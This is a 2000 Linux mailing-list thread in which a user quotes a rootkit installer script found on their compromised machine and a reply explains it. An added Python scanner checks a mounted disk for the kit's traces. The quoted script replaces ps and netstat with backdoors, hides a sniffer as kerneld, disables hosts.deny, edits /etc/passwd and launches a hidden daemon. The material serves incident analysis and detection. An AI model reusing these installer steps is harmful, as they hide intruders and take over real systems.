[lug] What does this mean?

D. Stimits stimits at idcomm.com
Tue Mar 21 18:26:10 MST 2000


nunar at mauromedia.net wrote:
> 
> After some investigating, I managed to get a hold of the utility that was run on my system.
> What is this doing? Please bear with me :)
> Thanks,
> Shannon
> 
> # !/bin/sh
> #
> # echo "* [ m O s ( l i n u x r k ) ] "
> # echo "* beginning installation "
> # if [ "`grep ALL /etc/hosts.deny`" ]; then
> #   echo "* cleaning hosts.deny, ALL found "
> #   mv -f /etc/hosts.deny /etc/host.deny
> # fi
> #
> # ./setssh
> #
> # echo "* moving backdoors - netstat, ps "
> # ./fix /bin/ps backdoor/ps /usr/lib/ldlibps.so
> # ./fix /bin/netstat backdoor/netstat /usr/lib/ldlibstat.so
> #
> # echo "* moving files "
> # mkdir -p /dev/sdd0
> # mv .lib/anGsniff /usr/sbin/kerneld
> # chattr +i /usr/sbin/kerneld
> # mv .lib/* /dev/sdd0 -f
> #
> # echo "* rehashing inetd "
> # killall -HUP inetd
> #
> # echo "* grepping cronexpl out of passwd "
> # grep -v cronexpl /etc/passwd >k
> # mv -f k /etc/passwd
> #
> # host=`hostname -f`
> # ip=`hostname -i`
> # hosts=`/sbin/ifconfig | grep "inet addr:" | wc -l`
> # bogo=`grep bogomips /proc/cpuinfo|awk -F ' ' '{ print $3 }'`
> # cpu=`uname -m`
> # let hostz=$(($hosts - 1))
> # uptime=`uptime|awk -F ' ' '{ print $3 }'`
> # totmem=`free | grep Mem: | awk -F ' ' '{ print $2 }'`
> # fremem=`free | grep Mem: | awk -F ' ' '{ print $4 }'`
> # rm -fr /tmp/lerka
> # echo " * system info:"
> # echo "  * uptime:    ${uptime} days "
> # echo "  * cpu:       ${cpu} "
> # echo "  * bmp:       ${bogo} "
> # echo "  * ips:       ${hostz} "
> # echo "  * total mem: ${totmem} "
> # echo "  * free  mem: ${fremem} "
> # echo "  * addr:      ${host} / ${ip} "
> # echo " * done "
> # rm -rf ../ac ../ler ../ak.tgz
> # if [ `ps x | grep sshd` == "" ]; then
> #   /usr/sbin/sshd
> #   ps x|grep sshd
> # fi
> # ps x | grep sshd
> # cd /dev/sdd0
> # nohup ./more >>/dev/null &
> # /usr/sbin/kerneld

It means all of your system abilities to detect and deny them have
been altered. Even secure shell was fixed to help them, which means
even snooping won't tell you what they are doing. You can't trust your
system connected to any network now. Likely a totally successful root
kit install, with access to anything and everything. Should you add
denial or firewalling against this person, very likely it will only
*tell* you that you are successful. Serious stuff.
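One defender-side check the reply implies, as an added example that is not part of the thread: a Python scan that, run from trusted rescue media against the compromised disk mounted read-only (so the replaced ps, netstat and sshd are never executed), looks for the filesystem artifacts the quoted installer leaves behind. The path names come from the script itself; the descriptions and the test fixture builder are my own.

```python
import os
import tempfile

# Artifacts named in the quoted install script, relative to the root of the
# compromised disk. Any hit should be confirmed against the distribution's
# package database from the rescue environment, not with the disk's own tools.
ARTIFACTS = {
    "etc/host.deny": "hosts.deny renamed to host.deny, so tcp_wrappers deny rules no longer apply",
    "usr/lib/ldlibps.so": "companion file passed to 'fix' with the replaced /bin/ps",
    "usr/lib/ldlibstat.so": "companion file passed to 'fix' with the replaced /bin/netstat",
    "usr/sbin/kerneld": "sniffer moved here and marked immutable with chattr +i",
    "dev/sdd0": "directory under /dev holding the kit's files and the './more' daemon",
}


def scan_rootkit_artifacts(root):
    """Return sorted (absolute path, description) pairs for artifacts present under root."""
    findings = []
    for rel, why in ARTIFACTS.items():
        if os.path.lexists(os.path.join(root, rel)):
            findings.append(("/" + rel, why))
    # The script moves /etc/hosts.deny away; its absence is itself a finding
    # when the misspelled /etc/host.deny sits in its place.
    if (os.path.exists(os.path.join(root, "etc/host.deny"))
            and not os.path.exists(os.path.join(root, "etc/hosts.deny"))):
        findings.append(("/etc/hosts.deny", "missing; original deny rules are no longer enforced"))
    return sorted(findings)


def build_sample_tree(infected=True):
    """Constructed fixture: a fake mounted disk, infected or clean, for exercising the scan."""
    root = tempfile.mkdtemp()
    for d in ("etc", "usr/lib", "usr/sbin", "dev", "bin"):
        os.makedirs(os.path.join(root, d))
    open(os.path.join(root, "bin/ps"), "w").close()
    if infected:
        os.makedirs(os.path.join(root, "dev/sdd0"))
        for f in ("etc/host.deny", "usr/lib/ldlibps.so", "usr/sbin/kerneld"):
            open(os.path.join(root, f), "w").close()
    else:
        with open(os.path.join(root, "etc/hosts.deny"), "w") as fh:
            fh.write("ALL: ALL\n")
    return root


if __name__ == "__main__":
    # On rescue media, point this at the mount point of the suspect disk instead of "/".
    for path, why in scan_rootkit_artifacts("/"):
        print(f"{path}: {why}")
```

Absence of these names proves nothing, since the kit's `fix` tool also rewrites binaries in place; the scan only flags the traces this particular script leaves.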